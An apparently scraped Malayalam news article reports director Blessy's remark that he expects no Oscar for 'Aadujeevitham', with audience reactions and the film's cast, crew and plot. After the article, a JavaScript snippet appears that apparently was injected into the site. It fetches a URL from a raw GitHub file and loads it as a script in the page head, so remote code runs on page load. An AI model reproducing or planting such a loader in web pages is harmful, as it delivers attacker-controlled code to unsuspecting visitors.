Home ENTERTAINMENT “ഓസ്കാർ പ്രതീക്ഷയില്ല” : ബ്ലെസി

“ഓസ്കാർ പ്രതീക്ഷയില്ല” : ബ്ലെസി

ആട് ജീവിതം ഫിലിമിന് ഓസ്കാർ കിട്ടുമെന്ന് പ്രതീക്ഷിക്കുന്നില്ലന്നും അതെല്ലാം കോടികളുടെ ബിസ്സിനെസ്സ് ആണെന്നും സംവിധായകൻ ബ്ലെസി പറയുന്നു. എന്നാൽ അതു ശരിയല്ലന്നും ചിത്രത്തിന് അർഹതയുണ്ടെങ്കിൽ കിട്ടുക തന്നെ ചെയ്യും പണം കൊടുത്തു വാങ്ങുന്നതല്ല ഓസ്കാർ എന്നും ഒരുകൂട്ടം പ്രേക്ഷകർ പ്രതികരിച്ചു.ഈ വർഷത്തെ ഏറ്റവും മികച്ച ചിത്രമാണ് ആട് ജീവിതം . ബെന്യാമിന്റെ ആടുജീവിതം എന്ന നോവലിനെ അടിസ്ഥാനമാക്കി, ബ്ലെസി തിരക്കഥയും സംവിധാനവും നിർവഹിച്ച് പുറത്തിറങ്ങിയ ചിത്രമാണ് ആടുജീവിതം. പൃഥ്വിരാജ് ആണ് നജീബ് എന്ന പ്രവാസിയുടെ എന്ന കഥാപാത്രത്തെ അവതരിപ്പിക്കുന്നത്. അമല പോൾ,വിനീത് ശ്രീനിവാസൻ,അപർണ്ണ ബാലമുരളി, ലെന തുടങ്ങിയ ഒരു കൂട്ടം താരാനിരയും ചിത്രത്തിലുണ്ട്. ക്യാമറ കൈകാര്യം ചെയ്യുന്നത് കെ. യു. മോഹനനും, ശബ്ദമിശ്രണവും നിർവഹിക്കുന്നത് റസൂൽ പൂക്കുട്ടിയും ആണ്. ചിത്രത്തിന്റെ പശ്ചാത്തല സംഗീതവും ഗാനങ്ങളും ഒരുക്കുന്നത് പ്രശസ്ത സംഗീത സംവിധായകൻ എ. ആർ. റഹ്മാൻ ആണ്.വലിയ സ്വപ്നങ്ങളുമായി സൗദി അറേബ്യയിൽ ജോലിയ്ക്കായി പോയി വഞ്ചിക്കപ്പെട്ട്, മരുഭൂമിയിലെ ഒരു ആടുവളർത്തൽ കേന്ദ്രത്തിലെ ദാരുണസാഹചര്യങ്ങളിൽ മൂന്നിലേറെ വർഷം അടിമപ്പണി ചെയ്യേണ്ടി വന്ന നജീബ് എന്ന മലയാളി യുവാവിന്റെ കഥയാണ്‌ ആടു ജീവിതം പറയുന്നത്. ആടു ജീവിതം കണ്ടിറങ്ങുന്ന ഓരോ പ്രേക്ഷകനും പിന്നീട് നജീബിനെ കുറിച്ച് പറയുമ്പോൾ പൃഥ്വിരാജിന്റെ മുഖമായിരിക്കും ഓർമ വരുക. അത്രത്തോളം നജീബ് അനുഭവിച്ച ജീവിതം പൃഥ്വിരാജ് സ്ക്രീനിൽ എത്തിച്ചിട്ടുണ്ട്. സംഭാഷണത്തിലെ, വാക്കുകളിലെ, നോട്ടത്തിലെ, കാഴ്ചയിലെ വ്യതിയാനങ്ങൾ പൃഥ്വിരാജ് ഇത്രമേൽ മനോഹരമായി പകർന്നാടുമ്പോൾ അതിന്റെ പിന്നിൽ പ്രവർത്തിച്ച ആർട്ടിനും മേക്കപ്പിനും വസ്ത്രത്തിനും വരെ വലിയ പ്രാധാന്യമുണ്ട്. പൃഥ്വിരാജിന്റെ ഏറ്റവും മികച്ച കഥാപാത്രം ആയിരിക്കും ആട് ജീവിതത്തിലെ നജീബ് എന്ന നിരൂപകർ അഭിപ്രായപ്പെടുന്നു. 2009 ലെ കേരള സാഹിത്യ അക്കാദമി അവാർഡ് നേടിയ നോവൽ കൂടിയാണ് ആടു ജീവിതം.

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
Exit mobile version